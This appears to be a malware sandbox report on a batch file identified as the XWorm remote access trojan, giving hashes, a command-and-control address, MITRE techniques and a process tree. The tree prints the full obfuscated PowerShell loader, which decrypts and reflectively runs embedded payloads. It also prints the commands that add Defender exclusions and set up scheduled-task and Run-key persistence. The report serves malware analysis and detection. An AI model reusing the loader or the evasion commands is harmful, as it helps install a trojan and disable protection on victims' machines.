xworm | ebd66fd9265f312babcebc214c9e23433e0c0e88504c5859f034bdacffd54ddb

Analysis

max time kernel
128s
max time network
146s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
22-05-2024 13:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

MonkerV1GuiTest.bat
Size

294KB
MD5

2b235c5e792b8c3dcbc4ccd0ccff02de
SHA1

6dd8fac6545df5f64bda4e746f3921d9a072bb59
SHA256

ebd66fd9265f312babcebc214c9e23433e0c0e88504c5859f034bdacffd54ddb
SHA512

cf61c50763cf8656bfb23250553052c1191179d30b50884f1cf8dcae64be48eae8dc43b9ccdb453e38e71bd4f5cfe94f8d44e86ba80552232eacdf23bac99e2f
SSDEEP

6144:6pA2upleIJqLKXd33GCpiMcOa+7seZEN3CbryZPhvAF8:6pAdpwoqa93GO2Oa+tON3CbGvf

Score

10^/10

xworm execution persistence rat trojan

Malware Config

Extracted

Family

xworm

135.125.21.87:7000

Attributes

Install_directory
%AppData%
install_file
USB.exe

Signatures

Detect Xworm Payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1580-115-0x000001F4FD760000-0x000001F4FD778000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

2 1580 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

1360 powershell.exe
4644 powershell.exe
1580 powershell.exe
3952 powershell.exe
1912 powershell.exe
4616 powershell.exe
1824 powershell.exe

flow	pid	process
2	1580	powershell.exe

Drops startup file 2 IoCs

Processes:

powershell.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Win32.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Win32.lnk	powershell.exe

Executes dropped EXE 1 IoCs

Processes:

Win32

pid process

2356 Win32

pid	process
2356	Win32

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Software\Microsoft\Windows\CurrentVersion\Run\Win32 = "C:\\Users\\Admin\\AppData\\Roaming\\Win32"	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

4756 schtasks.exe
Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings powershell.exe
Runs net.exe

pid	process
4756	schtasks.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 25 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeWin32

pid	process
1360	powershell.exe
1360	powershell.exe
1360	powershell.exe
4644	powershell.exe
4644	powershell.exe
4644	powershell.exe
1580	powershell.exe
1580	powershell.exe
1580	powershell.exe
3952	powershell.exe
3952	powershell.exe
3952	powershell.exe
1912	powershell.exe
1912	powershell.exe
1912	powershell.exe
4616	powershell.exe
4616	powershell.exe
4616	powershell.exe
1824	powershell.exe
1824	powershell.exe
1824	powershell.exe
1580	powershell.exe
2356	Win32
2356	Win32
2356	Win32

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1360	powershell.exe
Token: SeDebugPrivilege	4644	powershell.exe
Token: SeIncreaseQuotaPrivilege	4644	powershell.exe
Token: SeSecurityPrivilege	4644	powershell.exe
Token: SeTakeOwnershipPrivilege	4644	powershell.exe
Token: SeLoadDriverPrivilege	4644	powershell.exe
Token: SeSystemProfilePrivilege	4644	powershell.exe
Token: SeSystemtimePrivilege	4644	powershell.exe
Token: SeProfSingleProcessPrivilege	4644	powershell.exe
Token: SeIncBasePriorityPrivilege	4644	powershell.exe
Token: SeCreatePagefilePrivilege	4644	powershell.exe
Token: SeBackupPrivilege	4644	powershell.exe
Token: SeRestorePrivilege	4644	powershell.exe
Token: SeShutdownPrivilege	4644	powershell.exe
Token: SeDebugPrivilege	4644	powershell.exe
Token: SeSystemEnvironmentPrivilege	4644	powershell.exe
Token: SeRemoteShutdownPrivilege	4644	powershell.exe
Token: SeUndockPrivilege	4644	powershell.exe
Token: SeManageVolumePrivilege	4644	powershell.exe
Token: 33	4644	powershell.exe
Token: 34	4644	powershell.exe
Token: 35	4644	powershell.exe
Token: 36	4644	powershell.exe
Token: SeIncreaseQuotaPrivilege	4644	powershell.exe
Token: SeSecurityPrivilege	4644	powershell.exe
Token: SeTakeOwnershipPrivilege	4644	powershell.exe
Token: SeLoadDriverPrivilege	4644	powershell.exe
Token: SeSystemProfilePrivilege	4644	powershell.exe
Token: SeSystemtimePrivilege	4644	powershell.exe
Token: SeProfSingleProcessPrivilege	4644	powershell.exe
Token: SeIncBasePriorityPrivilege	4644	powershell.exe
Token: SeCreatePagefilePrivilege	4644	powershell.exe
Token: SeBackupPrivilege	4644	powershell.exe
Token: SeRestorePrivilege	4644	powershell.exe
Token: SeShutdownPrivilege	4644	powershell.exe
Token: SeDebugPrivilege	4644	powershell.exe
Token: SeSystemEnvironmentPrivilege	4644	powershell.exe
Token: SeRemoteShutdownPrivilege	4644	powershell.exe
Token: SeUndockPrivilege	4644	powershell.exe
Token: SeManageVolumePrivilege	4644	powershell.exe
Token: 33	4644	powershell.exe
Token: 34	4644	powershell.exe
Token: 35	4644	powershell.exe
Token: 36	4644	powershell.exe
Token: SeIncreaseQuotaPrivilege	4644	powershell.exe
Token: SeSecurityPrivilege	4644	powershell.exe
Token: SeTakeOwnershipPrivilege	4644	powershell.exe
Token: SeLoadDriverPrivilege	4644	powershell.exe
Token: SeSystemProfilePrivilege	4644	powershell.exe
Token: SeSystemtimePrivilege	4644	powershell.exe
Token: SeProfSingleProcessPrivilege	4644	powershell.exe
Token: SeIncBasePriorityPrivilege	4644	powershell.exe
Token: SeCreatePagefilePrivilege	4644	powershell.exe
Token: SeBackupPrivilege	4644	powershell.exe
Token: SeRestorePrivilege	4644	powershell.exe
Token: SeShutdownPrivilege	4644	powershell.exe
Token: SeDebugPrivilege	4644	powershell.exe
Token: SeSystemEnvironmentPrivilege	4644	powershell.exe
Token: SeRemoteShutdownPrivilege	4644	powershell.exe
Token: SeUndockPrivilege	4644	powershell.exe
Token: SeManageVolumePrivilege	4644	powershell.exe
Token: 33	4644	powershell.exe
Token: 34	4644	powershell.exe
Token: 35	4644	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

powershell.exe

pid process

1580 powershell.exe

pid	process
1580	powershell.exe

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

cmd.exenet.exepowershell.exeWScript.execmd.exenet.exepowershell.exe

description	pid	process	target process
PID 660 wrote to memory of 1568	660	cmd.exe	net.exe
PID 660 wrote to memory of 1568	660	cmd.exe	net.exe
PID 1568 wrote to memory of 1964	1568	net.exe	net1.exe
PID 1568 wrote to memory of 1964	1568	net.exe	net1.exe
PID 660 wrote to memory of 1360	660	cmd.exe	powershell.exe
PID 660 wrote to memory of 1360	660	cmd.exe	powershell.exe
PID 1360 wrote to memory of 4644	1360	powershell.exe	powershell.exe
PID 1360 wrote to memory of 4644	1360	powershell.exe	powershell.exe
PID 1360 wrote to memory of 5040	1360	powershell.exe	WScript.exe
PID 1360 wrote to memory of 5040	1360	powershell.exe	WScript.exe
PID 5040 wrote to memory of 3736	5040	WScript.exe	cmd.exe
PID 5040 wrote to memory of 3736	5040	WScript.exe	cmd.exe
PID 3736 wrote to memory of 608	3736	cmd.exe	net.exe
PID 3736 wrote to memory of 608	3736	cmd.exe	net.exe
PID 608 wrote to memory of 1816	608	net.exe	net1.exe
PID 608 wrote to memory of 1816	608	net.exe	net1.exe
PID 3736 wrote to memory of 1580	3736	cmd.exe	powershell.exe
PID 3736 wrote to memory of 1580	3736	cmd.exe	powershell.exe
PID 1580 wrote to memory of 3952	1580	powershell.exe	powershell.exe
PID 1580 wrote to memory of 3952	1580	powershell.exe	powershell.exe
PID 1580 wrote to memory of 1912	1580	powershell.exe	powershell.exe
PID 1580 wrote to memory of 1912	1580	powershell.exe	powershell.exe
PID 1580 wrote to memory of 4616	1580	powershell.exe	powershell.exe
PID 1580 wrote to memory of 4616	1580	powershell.exe	powershell.exe
PID 1580 wrote to memory of 1824	1580	powershell.exe	powershell.exe
PID 1580 wrote to memory of 1824	1580	powershell.exe	powershell.exe
PID 1580 wrote to memory of 4756	1580	powershell.exe	schtasks.exe
PID 1580 wrote to memory of 4756	1580	powershell.exe	schtasks.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\MonkerV1GuiTest.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:660

C:\Windows\system32\net.exe
net file
2⤵
- Suspicious use of WriteProcessMemory
PID:1568

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
3⤵
PID:1964

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YEfma8Fsqpo8Nxcmsh2LlMT5phz3RC1od46Bs4haKuk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bS7q7G7pSQFFezaTbyErVA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HUiNZ=New-Object System.IO.MemoryStream(,$param_var); $wYjxe=New-Object System.IO.MemoryStream; $eamGN=New-Object System.IO.Compression.GZipStream($HUiNZ, [IO.Compression.CompressionMode]::Decompress); $eamGN.CopyTo($wYjxe); $eamGN.Dispose(); $HUiNZ.Dispose(); $wYjxe.Dispose(); $wYjxe.ToArray();}function execute_function($param_var,$param2_var){ $ddqEY=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KPhFH=$ddqEY.EntryPoint; $KPhFH.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\MonkerV1GuiTest.bat';$zudcm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\MonkerV1GuiTest.bat').Split([Environment]::NewLine);foreach ($XVfwy in $zudcm) { if ($XVfwy.StartsWith(':: ')) { $bxXKt=$XVfwy.Substring(3); break; }}$payloads_var=[string[]]$bxXKt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1360

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_699_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_699.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4644

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_699.vbs"
3⤵
- Suspicious use of WriteProcessMemory
PID:5040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_699.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:3736

C:\Windows\system32\net.exe
net file
5⤵
- Suspicious use of WriteProcessMemory
PID:608

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
6⤵
PID:1816

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YEfma8Fsqpo8Nxcmsh2LlMT5phz3RC1od46Bs4haKuk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bS7q7G7pSQFFezaTbyErVA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HUiNZ=New-Object System.IO.MemoryStream(,$param_var); $wYjxe=New-Object System.IO.MemoryStream; $eamGN=New-Object System.IO.Compression.GZipStream($HUiNZ, [IO.Compression.CompressionMode]::Decompress); $eamGN.CopyTo($wYjxe); $eamGN.Dispose(); $HUiNZ.Dispose(); $wYjxe.Dispose(); $wYjxe.ToArray();}function execute_function($param_var,$param2_var){ $ddqEY=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KPhFH=$ddqEY.EntryPoint; $KPhFH.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_699.bat';$zudcm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_699.bat').Split([Environment]::NewLine);foreach ($XVfwy in $zudcm) { if ($XVfwy.StartsWith(':: ')) { $bxXKt=$XVfwy.Substring(3); break; }}$payloads_var=[string[]]$bxXKt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1580

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3952

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1912

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Win32'
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4616

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Win32'
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1824

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Win32" /tr "C:\Users\Admin\AppData\Roaming\Win32"
6⤵
- Creates scheduled task(s)
PID:4756

C:\Users\Admin\AppData\Roaming\Win32
C:\Users\Admin\AppData\Roaming\Win32
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2356

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Query Registry

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
d4ac7391fd23c0ad0c6ed9c7ea98f287

SHA1
683431e2fe4aafac6e66b0beb72581713e6076f4

SHA256
31babb713b3b56c572a38cfa0c2cd7bbdf7da7be759c507c683a5e579f3bdce2

SHA512
b10dabd1c3b09e6b7fb4aba542907f659c77ecd86f574b6edfe60a3d7d2a214ba9a0763fc5c14daf152b0e39b10e6d981bfdafceac5fa0e338cd21450febb424

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
1d4a155a1b0b1cbfcfb8fe6a7613cc24

SHA1
03457d9128ada0e15f979429f52b89dba27d12b0

SHA256
9b6e2eeddd54e7ef329df2a85a1b256c61a02d3bf0593210e5211f26d720518d

SHA512
60c25309198f287d213d6a2c5a953335eb98d29a795851bf17464a5980842488f7122f07fe308b34fe59b802a33cea936c44a402ae04d98236a8517fa23df16b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
8e9fc5e3884e45406faacc5e195eaa72

SHA1
53b522ee43f9539378c247cd333a422e46e3680a

SHA256
0c9156566c600c32b4103c10725fffc2311bad19f20fd4797bfb537855fa059a

SHA512
cfe05edabb1f654f3dc86c73a182a986d0ece1b32401d5e7fdb8965cdd2765ec82251047d3d53d123c15171b8d158edba12243603d5d3efa375f909722fecde0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
9877c90918d6a2a5838c96ed9ae4b1e6

SHA1
0f42e3c9f458dcc7a4b36314f9626b79ee1b3372

SHA256
fa49f3172eb4a081619a06ca5fa0117e89b8678ef1f8acee1a08f1a803110443

SHA512
28d3119dc6d621363ad848a0e7e8f8c0552d48b05d037cde42f13a2bcbfb545f60362adb65c3445844372f5e40affb6a058045b941c6fb2bc72116eca6226d8b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ojirqle0.g3m.ps1
Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Roaming\Win32
Filesize
435KB

MD5
f7722b62b4014e0c50adfa9d60cafa1c

SHA1
f31c17e0453f27be85730e316840f11522ddec3e

SHA256
ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

SHA512
7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_699.bat
Filesize
294KB

MD5
2b235c5e792b8c3dcbc4ccd0ccff02de

SHA1
6dd8fac6545df5f64bda4e746f3921d9a072bb59

SHA256
ebd66fd9265f312babcebc214c9e23433e0c0e88504c5859f034bdacffd54ddb

SHA512
cf61c50763cf8656bfb23250553052c1191179d30b50884f1cf8dcae64be48eae8dc43b9ccdb453e38e71bd4f5cfe94f8d44e86ba80552232eacdf23bac99e2f

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_699.vbs
Filesize
115B

MD5
f308d5d131313424fee9aedafb2e1a66

SHA1
1a61c5f5051f5ca027bf2e0431b963fe4442fbe7

SHA256
1c59e31ca06a1649b5c36a3d230278f45efc921a229b72dc0f47c9c485963ac9

SHA512
132f35947428e4347386b0da111f2ceff1e71b75799b3a9ca00d963cf662eac75c84f8fa6a720cb0fe8cc1c8bb37842843d42fb0b07c0a3f564806a4cb6efa3c

Download Submit
memory/1360-12-0x0000011DD7940000-0x0000011DD79B6000-memory.dmp

Filesize
472KB

Download
memory/1360-29-0x0000011DBF7E0000-0x0000011DBF81A000-memory.dmp

Filesize
232KB

Download
memory/1360-28-0x0000011DBF7D0000-0x0000011DBF7D8000-memory.dmp

Filesize
32KB

Download
memory/1360-23-0x00007FFE96C10000-0x00007FFE96DEB000-memory.dmp

Filesize
1.9MB

Download
memory/1360-3-0x00007FFE96C10000-0x00007FFE96DEB000-memory.dmp

Filesize
1.9MB

Download
memory/1360-7-0x0000011DBF760000-0x0000011DBF782000-memory.dmp

Filesize
136KB

Download
memory/1360-6-0x00007FFE96C10000-0x00007FFE96DEB000-memory.dmp

Filesize
1.9MB

Download
memory/1360-5-0x00007FFE96C10000-0x00007FFE96DEB000-memory.dmp

Filesize
1.9MB

Download
memory/1360-89-0x00007FFE96C10000-0x00007FFE96DEB000-memory.dmp

Filesize
1.9MB

Download
memory/1580-115-0x000001F4FD760000-0x000001F4FD778000-memory.dmp

Filesize
96KB

Download
memory/2356-337-0x0000026A78BB0000-0x0000026A78BEC000-memory.dmp

Filesize
240KB

Download
memory/4644-75-0x00007FFE96C10000-0x00007FFE96DEB000-memory.dmp

Filesize
1.9MB

Download
memory/4644-42-0x00007FFE96C10000-0x00007FFE96DEB000-memory.dmp

Filesize
1.9MB

Download
memory/4644-43-0x00007FFE96C10000-0x00007FFE96DEB000-memory.dmp

Filesize
1.9MB

Download
memory/4644-41-0x00007FFE96C10000-0x00007FFE96DEB000-memory.dmp

Filesize
1.9MB

Download